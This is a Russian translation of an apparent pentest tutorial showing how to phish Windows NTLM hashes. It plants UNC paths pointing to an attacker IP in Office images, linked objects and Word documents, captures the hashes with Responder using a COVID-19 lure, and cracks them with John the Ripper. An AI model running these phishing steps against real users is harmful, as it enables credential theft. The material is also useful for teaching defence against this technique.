В этой статье говорится о том, как злоумышленник использует Microsoft Оffice для проведения фишинговой атаки, чтобы получить хэши NTLM в Windows.
Все и так знают, что приложения Microsoft Office, такие как Word, PowerPoint, Excel и Outlook, являются самыми надежными ресурсами в любой организации. Часто злоумышленник использует эту зависимость, чтобы спрятать аккаунт нового пользователя. В данном случае читатели смогут понять, как применение фишинга может быть эффективно для захвата хэшей Microsoft Windows NTLM.
На самом деле, злоумышленник пытался использовать метод инъекции UNC Path для захвата хэшей Windows NTLM и задействовать фишинг для достижения поставленной цели.
Пошаговый разбор
Пользователь применяет Kali Linux, его IP-адрес – 192.168.1.112. Он будет использоваться для получения UNC Path.
Ссылка UNC Path в изображении
Цель номер 1: отправить целевому пользователю фишинговое сообщение, содержащее вредоносное изображение.
Пользователю нужно использовать Оffice 365 для связывания UNC-пути в образ, для этого следует вставить образ и создать письмо для своей жертвы, чтобы замаскировать его.
Необходимо ввести путь UNC, добавив гиперссылку на изображение, как показано ниже на картинке. Теперь злоумышленник использует изображения по предотвращению распространения COVID-19 для проведения крупномасштабной фишинг-атаки.
Также здесь был задействован IP-адрес Kali Linux, чтобы украсть хэши NTLM. Эта фаза может рассматриваться как легкая для охотника за угрозами кибербезопасности при охоте на IOC в соответствии с существующими порядками, потому что здесь вредоносный доменный адрес злоумышленника или IP-адрес в формате dword применяется для уклонения от системы обнаружения.
После того как пользователь подготовил свое сообщение с помощью Оffice 365, нужно установить ответчик (респондер) на свой Kali Linux, который будет захватывать хэши NTLM.
Ответчиком является функция LLMNR, NBT-NS и MDNS как «отравителя системы» с встроенной HTTP/SMB/MSSQL/FTP/LDAP аутентификацией для сервера с поддержкой протокола NTLMv1/NTLMv2/LMv2, расширенной службой безопасности NTLMSSP и базовой HTTP-аутентификацией.
Необходимо выполнить данную команду и сразу после этого отправить письмо своей жертве:
responder -I eth0 -v
Теперь, когда жертва откроет почту и нажмет на полученное изображение или откроет новую вкладку и сохранит картинку, его/ее NTLM-хэши будут украдены без ведома получателя.
В результате злоумышленник получит NTLM-хэши машины жертвы, как показано на рисунке ниже. Здесь он сможет заметить, что он получил имя пользователя NetBIOS вместе с хэшами.
Злоумышленник также может использовать John’s ripper или другие инструменты хеширования NTLM для получения пароля. Как читатели могут увидеть, пользователь задействовал вышеупомянутый файл хэшей NTLM, сгенерированный ответчиком, чтобы извлечь пароль жертвы с помощью John the Ripper.
Ссылка UNC PATH в текстовом файле
Цель номер 2: отправить фишинговое сообщение целевому пользователю, в котором будет содержаться вредоносный объект.
До Office 2013 можно было отправить вредоносное вложение, введя UNC-путь, но после Office 2013 опция ссылки на файл отключена, что не позволяет злоумышленнику провести фишинговую атаку через вредоносное вложение.
Тем не менее, злоумышленник все еще знает об альтернативе отправки вредоносного вложения. Несмотря на отправку вложения, он пытается привязать ссылку к объекту, отправляемому по почте.
Здесь пользователь добавил текстовый файл в качестве объекта, он, к сожалению, не может использовать функцию «link to file» для ввода UNC-пути.
Как только пользователь добавит объект, нужно ввести гиперссылку для UNC-пути, как это было сделано выше, т.е. \\192.168.1.112, и отправить письмо жертве. С другой стороны, ему следует использовать ответчик, чтобы украсть хэши NLTM, как это было сделано также выше.
Теперь, когда жертва откроет почту и нажмет на текстовый файл или откроет его в новой вкладке, NTLM-хэши пользователя будут украдены без его ведома.
В результате злоумышленник получит NTLM-хэши машины жертвы, как показано на рисунке ниже. Здесь читатели могут заметить, что получено имя пользователя NetBIOS вместе с хэшами.
Ссылка UNC PATH в документе Word
Цель номер 3: отправить фишинговое сообщение целевому пользователю, которое содержит вредоносный документ Word.
В большинстве случаев злоумышленник использует документ Word для того чтобы создать подлинные письма. Таким образом, он добавляет UNC-путь в виде гиперссылки в файл Word. Но, как уже было сказано, Outlook отказался от функции «link to file» или «insert as a link», чтобы предотвратить отправку злоумышленниками вредоносных документов.
Существует альтернативный метод, который позволяет человеку внедрить UNC-путь во вложение. Пользователь написал HTML-код в текстовом файле, содержащем ссылку UNC Path в src-образе, как показано на примере html-образа.
Теперь следует открыть документ Word и связать html-файл как объект, таким образом пользователь перейдет по следующему пути: «insert > Object > Text from file».
Пользователь вставит HTML-файл и выберит опцию «insert as a link», как показано на рисунке.
Теперь надо использовать документ Word, содержащий ссылку на HTML-файл, который будет отправлен в качестве вложения и доставлен по почте жертве. Необходимо дождаться ответа на это сообщение, пользователь добавил ответчика в бэкдор.
Когда жертва откроет почту и нажмет на текст или откроет его в новой вкладке, его/ее NTLM-хэши будут украдены без ведома пользователя.
В результате злоумышленник получит NTLM-хэши машины жертвы, как показано на рисунке ниже. Здесь читатели могут заметить, что было получено имя пользователя NetBIOS вместе с хэшами.
Заключение
Итак, читатели смогли увидеть, как злоумышленник ловко добавил UNC-путь в изображение, текстовый файл или документ Word и замаскировал его, отправив фишинговое сообщение.
Автор переведенной статьи: Raj Chandel.
Важно! Информация исключительно в учебных целях. Пожалуйста, соблюдайте законодательство и не применяйте данную информацию в незаконных целях.
